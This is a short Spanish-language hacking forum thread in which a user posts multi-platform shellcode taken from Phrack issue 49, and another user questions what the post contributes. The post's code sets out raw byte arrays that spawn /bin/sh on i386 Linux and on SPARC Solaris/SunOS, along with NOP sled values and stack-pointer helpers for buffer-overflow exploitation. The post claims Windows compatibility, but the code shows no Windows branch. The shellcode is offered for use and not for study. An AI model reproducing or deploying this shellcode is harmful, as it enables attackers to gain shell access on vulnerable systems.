Páginas: [1] 
|
 |
|
 Autor
|
Tema: Shellcode para multiples Sistemas Operativos (Leído 312 veces)
|
WHK
 Desconectado
Mensajes: 835
+-=[Yan]=-+
|
He estado leyendo un buen ezine y encontré esta shellcode compatible con Windows, Linux, Sun, entre varios mas: #if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)
#define NOP_SIZE 4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
unsigned long get_sp(void) {
__asm__("or %sp, %sp, %i0");
}
#elif defined(__sparc__) && defined(__sun__)
#define NOP_SIZE 4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
unsigned long get_sp(void) {
__asm__("or %sp, %sp, %i0");
}
#endif El ezine se llama Phrack en el número 49 |
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Pero no entiendo cual es la aportacion, leernos la phrack? o tomar en cuenta los shellcodes que se mencionan?
existe "in the wild" ya varios programas para tener un multi-shellcode, e.g, Aix. Solaris, BSD, HP, etc. espero postear este code pronto.
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 835
+-=[Yan]=-+
|
Puse de donde lo saqué para mencionar la fuente pero la idea era que pudieran tener una sola shellcode para multiples sistemas operativos porque yo antes tenía que usar una para windows y otra para linux. Veo que ya habia este tipo de códigos en el foro asi que sorry, creo que se me está quitando la costumbre de usar el buscador. Las shellcodes que usaba son las que están en http://www.elhacker.net/exploits/En realidad solo dos veces me he topado con solaris y un BSD porque la mayoría de las veces debo hacerlo en linux. |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
